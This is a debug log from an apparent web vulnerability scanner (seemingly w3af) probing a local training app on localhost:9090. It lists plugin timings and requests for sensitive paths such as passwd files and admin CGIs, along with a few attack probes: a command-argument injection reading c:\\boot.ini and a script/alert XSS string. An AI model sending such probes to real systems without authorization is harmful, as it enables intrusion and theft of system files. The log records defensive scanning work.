code_disclosure.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:32 2020 - debug] serialized_object.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] blank_body.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] credit_cards.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] websockets_links.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] csp.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] dom_xss.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] vulners_db.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] keys.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/bdata/ returned HTTP code "404" (id=23925,from_cache=0,grep=1,rtt=0.06,did=04g52KJT) [Wed Feb 12 10:04:32 2020 - debug] file_upload.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] clamav.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] expect_ct.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] svn_users.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] url_session.grep(uri="http://localhost:9090/1999/") took 0.01s to run [Wed Feb 12 10:04:32 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] objects.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] error_500.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_tags.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] password_profiling.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] click_jacking.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] lang.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_reason.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cache_control.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_headers.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] ssn.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] oracle.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/informacion/ returned HTTP code "404" (id=23927,from_cache=0,grep=1,rtt=0.21,did=uDLEsu1M) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/file/ returned HTTP code "404" (id=23928,from_cache=0,grep=1,rtt=0.06,did=6jMpUV6P) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/server_stats/ returned HTTP code "404" (id=23931,from_cache=0,grep=1,rtt=0.11,did=uhtHmnDG) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/Web_store/ returned HTTP code "404" (id=23932,from_cache=0,grep=1,rtt=0.05,did=kW7PAdTd) [Wed Feb 12 10:04:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12394, 'reject-seen-url': 5744, 'reject-out-of-scope': 216, 'accept': 4946} [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/admin.cgi returned HTTP code "404" (id=23933,from_cache=0,grep=1,rtt=0.15,did=NMCQnEj2) [Wed Feb 12 10:04:32 2020 - debug] feeds.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/news returned HTTP code "404" (id=23930,from_cache=0,grep=1,rtt=0.14,did=ScepY97o) [Wed Feb 12 10:04:32 2020 - debug] error_pages.grep(uri="http://localhost:9090/1999/") took 0.05s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/ftp/ returned HTTP code "404" (id=23929,from_cache=0,grep=1,rtt=0.14,did=AVSaUNZX) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=23936,from_cache=0,grep=0,rtt=0.11,did=jn5omf5C) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2281. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/passwd.txt returned HTTP code "404" (id=23937,from_cache=0,grep=1,rtt=0.05,did=2wHVs3kC) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/wwwjoin/ returned HTTP code "404" (id=23934,from_cache=0,grep=1,rtt=0.02,did=mq9d9YX6) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full returned HTTP code "404" (id=23939,from_cache=0,grep=1,rtt=0.02,did=QAE7nDAF) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/reports/ returned HTTP code "404" (id=23941,from_cache=0,grep=1,rtt=0.02,did=92anK1hq) [Wed Feb 12 10:04:32 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/1999/") took 0.07s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/dfire.cgi returned HTTP code "404" (id=23935,from_cache=0,grep=1,rtt=0.09,did=j7yDrKAn) [Wed Feb 12 10:04:32 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: jn5omf5C) [Wed Feb 12 10:04:32 2020 - debug] detailed._login() took 0.80s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/certificate returned HTTP code "404" (id=23944,from_cache=0,grep=1,rtt=0.17,did=zp39CGJI) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/java/ returned HTTP code "404" (id=23938,from_cache=0,grep=1,rtt=0.03,did=GV5o4Ylf) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/webdata/ returned HTTP code "404" (id=23943,from_cache=0,grep=1,rtt=0.03,did=FG0Aiv05) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/cgi-bin/WINDMAIL.EXE? -n c:\\boot.ini%= returned HTTP code "404" (id=23940,from_cache=0,grep=1,rtt=0.10,did=vuw02vg6) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/logger/ returned HTTP code "404" (id=23942,from_cache=0,grep=1,rtt=0.20,did=3LaTzrfb) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4533. [Wed Feb 12 10:04:32 2020 - debug] localhost:9090 connection pool stats (free:204 / in_use:12 / max:50 / total:216) [Wed Feb 12 10:04:32 2020 - debug] Connections with more in use time: (203efdeeb893e959, 0.17 sec) (c4706ed5377c78d0, 0.16 sec) (aa5b8298906d160f, 0.16 sec) (adfd9925e005785c, 0.15 sec) (a37dee85624d75f9, 0.10 sec) [Wed Feb 12 10:04:32 2020 - debug] symfony.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:32 2020 - debug] file_upload.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] expect_ct.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] svn_users.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] private_ip.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] motw.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_generator.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] retirejs.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2282. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/clickcount.pl?view=test returned HTTP code "404" (id=23945,from_cache=0,grep=1,rtt=0.08,did=Ll2Vl0Bg) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/@PHPMYADMINchangelog.php returned HTTP code "404" (id=23946,from_cache=0,grep=1,rtt=0.06,did=FT97OgWo) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/code/ returned HTTP code "404" (id=23947,from_cache=0,grep=1,rtt=0.14,did=LQpRBMbN) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4533. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/purchase/ returned HTTP code "404" (id=23948,from_cache=0,grep=1,rtt=0.12,did=kxu4RmgG) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/fileadmin/ returned HTTP code "404" (id=23949,from_cache=0,grep=1,rtt=0.09,did=cMfZCgUj) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/windows/ returned HTTP code "404" (id=23950,from_cache=0,grep=1,rtt=0.13,did=p5O4zl7Z) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/log.txt returned HTTP code "404" (id=23952,from_cache=0,grep=1,rtt=0.11,did=sC68So2n) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/private/ returned HTTP code "404" (id=23953,from_cache=0,grep=1,rtt=0.11,did=ZodHFUUV) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/statistic/ returned HTTP code "404" (id=23955,from_cache=0,grep=1,rtt=0.19,did=Klt0Lc5k) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/development/ returned HTTP code "404" (id=23956,from_cache=0,grep=1,rtt=0.19,did=H4Ff91KN) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/home/ returned HTTP code "404" (id=23957,from_cache=0,grep=1,rtt=0.04,did=hbXd8GMr) [Wed Feb 12 10:04:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12409, 'reject-seen-url': 5753, 'reject-out-of-scope': 216, 'accept': 4947} [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/Sources/ returned HTTP code "404" (id=23958,from_cache=0,grep=1,rtt=0.18,did=UMad8st6) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/master.password returned HTTP code "404" (id=23959,from_cache=0,grep=1,rtt=0.04,did=IOZyfiwf) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/data/ returned HTTP code "404" (id=23960,from_cache=0,grep=1,rtt=0.09,did=9096gGYv) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/trees/ returned HTTP code "404" (id=23961,from_cache=0,grep=1,rtt=0.07,did=Ud2Nn66t) [Wed Feb 12 10:04:32 2020 - debug] blank_body.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] credit_cards.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] websockets_links.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] csp.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] dom_xss.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:32 2020 - debug] serialized_object.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] keys.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2283. [Wed Feb 12 10:04:32 2020 - debug] clamav.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4533. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/scr/ returned HTTP code "404" (id=23954,from_cache=0,grep=1,rtt=0.17,did=dpyBndNy) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/maillist.pl returned HTTP code "404" (id=23951,from_cache=0,grep=1,rtt=0.12,did=INpzhva2) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/login.cgi returned HTTP code "404" (id=23963,from_cache=0,grep=1,rtt=0.20,did=tT6ZP8PW) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/passwdfile returned HTTP code "404" (id=23964,from_cache=0,grep=1,rtt=0.13,did=aRBaSjl4) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/test/ returned HTTP code "404" (id=23966,from_cache=0,grep=1,rtt=0.07,did=tAOro5or) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/counter/ returned HTTP code "404" (id=23967,from_cache=0,grep=1,rtt=0.09,did=1Bggy47A) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/warez/ returned HTTP code "404" (id=23968,from_cache=0,grep=1,rtt=0.05,did=XLBFqtJk) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/mqseries/ returned HTTP code "404" (id=23969,from_cache=0,grep=1,rtt=0.20,did=uOsho4Um) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/ftp.pl returned HTTP code "404" (id=23970,from_cache=0,grep=1,rtt=0.29,did=JOdV78mH) [Wed Feb 12 10:04:32 2020 - debug] vulners_db.grep(uri="http://localhost:9090/tips/") took 0.11s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2284. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/awebvisit.stat returned HTTP code "404" (id=23965,from_cache=0,grep=1,rtt=0.06,did=1M0yqgwW) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/orders/mountain.cfg returned HTTP code "404" (id=23962,from_cache=0,grep=1,rtt=0.14,did=ldTst5RQ) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2285. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2286. [Wed Feb 12 10:04:32 2020 - debug] url_session.grep(uri="http://localhost:9090/tips/") took 0.02s to run [Wed Feb 12 10:04:32 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] objects.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] error_500.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] password_profiling.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] click_jacking.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] lang.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_tags.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2287. [Wed Feb 12 10:04:32 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2288. [Wed Feb 12 10:04:32 2020 - debug] strange_reason.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cache_control.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_headers.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] ssn.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] oracle.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] feeds.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] error_pages.grep(uri="http://localhost:9090/tips/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/iisadmpwd/aexp4.htr returned HTTP code "404" (id=23971,from_cache=0,grep=1,rtt=0.12,did=Vuut2koe) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/ax-admin.cgi returned HTTP code "404" (id=23973,from_cache=0,grep=1,rtt=0.21,did=Lterij3o) [Wed Feb 12 10:04:32 2020 - debug] localhost:9090 connection pool stats (free:216 / in_use:3 / max:50 / total:219) [Wed Feb 12 10:04:32 2020 - debug] Connections with more in use time: (7204edeb7184bd28, 0.14 sec) (6fe035da600043b5, 0.06 sec) (1200b64bbbaaa87f, 0.04 sec) [Wed Feb 12 10:04:32 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:32 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/tips/") took 0.06s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/bdatos/ returned HTTP code "404" (id=23972,from_cache=0,grep=1,rtt=0.05,did=jundaJWa) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/jdbc/ returned HTTP code "404" (id=23974,from_cache=0,grep=1,rtt=0.08,did=sqUX8lHb) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/noticias/ returned HTTP code "404" (id=23978,from_cache=0,grep=1,rtt=0.20,did=ZYZc3sY2) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/wwwlog/ returned HTTP code "404" (id=23979,from_cache=0,grep=1,rtt=0.13,did=bhkH0ZVa) [Wed Feb 12 10:04:32 2020 - debug] Worker with ID GrepWorker(2XKnj13Q) is idle. [Wed Feb 12 10:04:32 2020 - debug] 10% of GrepWorker workers are idle. [Wed Feb 12 10:04:32 2020 - debug] GrepWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 10:04:32 2020 - debug] GrepWorker worker pool has 29 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/service/ returned HTTP code "404" (id=23976,from_cache=0,grep=1,rtt=0.24,did=VgoP4Kkc) [Wed Feb 12 10:04:32 2020 - debug] symfony.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/logging/ returned HTTP code "404" (id=23977,from_cache=0,grep=1,rtt=0.23,did=GrsYMDb0) [Wed Feb 12 10:04:32 2020 - debug] file_upload.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2289. [Wed Feb 12 10:04:32 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] expect_ct.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] svn_users.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] private_ip.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] motw.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_generator.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] retirejs.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/zorum/index.php?method=<=<=&script=>=>=&alert(\'Vulnerable\')=&/script= returned HTTP code "404" (id=23900,from_cache=0,grep=1,rtt=0.03,did=bpoS68dg) [Wed Feb 12 10:04:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12426, 'reject-seen-url': 5761, 'reject-out-of-scope': 216, 'accept': 4947} [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/imagenes/ returned HTTP code "404" (id=23980,from_cache=0,grep=1,rtt=0.03,did=4wn2XczE) [Wed Feb 12 10:04:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12426, 'reject-seen-url': 5761, 'reject-out-of-scope': 216, 'accept': 4947} [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/admin.php returned HTTP code "404" (id=23981,from_cache=0,grep=1,rtt=0.05,did=lC4fRKbX) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/information/ returned HTTP code "404" (id=23983,from_cache=0,grep=1,rtt=0.06,did=dc1VFXjq) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/code.php returned HTTP code "404" (id=23984,from_cache=0,grep=1,rtt=0.05,did=83ogejB7) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/employees/ returned HTTP code "404" (id=23975,from_cache=0,grep=1,rtt=0.17,did=i9XvfYjY) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/gfx/ returned HTTP code "404" (id=23985,from_cache=0,grep=1,rtt=0.04,did=W2c3JAmD) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/sys/ returned HTTP code "404" (id=23987,from_cache=0,grep=1,rtt=0.20,did=uzggm06i) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/mbox returned HTTP code "404" (id=23989,from_cache=0,grep=1,rtt=0.10,did=fGAiqKmn) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/StoreDB/ returned HTTP code "404" (id=23990,from_cache=0,grep=1,rtt=0.11,did=Ut3horQz) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/dir/ returned HTTP code "404" (id=23991,from_cache=0,grep=1,rtt=0.16,did=LtqN1iTr) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/communicator/ returned HTTP code "404" (id=23992,from_cache=0,grep=1,rtt=0.08,did=va0TsoNe) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/reseller/ returned HTTP code "404" (id=23994,from_cache=0,grep=1,rtt=0.12,did=lKOhIFGV) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/dig.cgi returned HTTP code "404" (id=23982,from_cache=0,grep=1,rtt=0.10,did=JmEx2Fao) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/card/ returned HTTP code "404" (id=23993,from_cache=0,grep=1,rtt=0.13,did=tzcfdkTm) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/weblog/ returned HTTP code "404" (id=23986,from_cache=0,grep=1,rtt=0.07,did=jMZftskF) [Wed Feb 12 10:04:32 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:32 2020 - debug] serialized_object.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] blank_body.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] credit_cards.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] websockets_links.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] csp.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] dom_xss.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] keys.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/passwd returned HTTP code "404" (id=23995,from_cache=0,grep=1,rtt=0.08,did=dynd7QpU) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/certificates returned HTTP code "404" (id=23988,from_cache=0,grep=1,rtt=0.17,did=jjws4le3) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4532. [Wed Feb 12 10:04:32 2020 - debug] text_file.flush() took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] console.flush() took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] localhost:9090 connection pool stats (free:209 / in_use:12 / max:50 / total:221) [Wed Feb 12 10:04:32 2020 - debug] Connections with more in use time: (74a1335de40f62d3, 0.15 sec) (6fe035da600043b5, 0.10 sec) (6f75b66ef647aeb9, 0.10 sec) (aa5b8298906d160f, 0.10 sec) 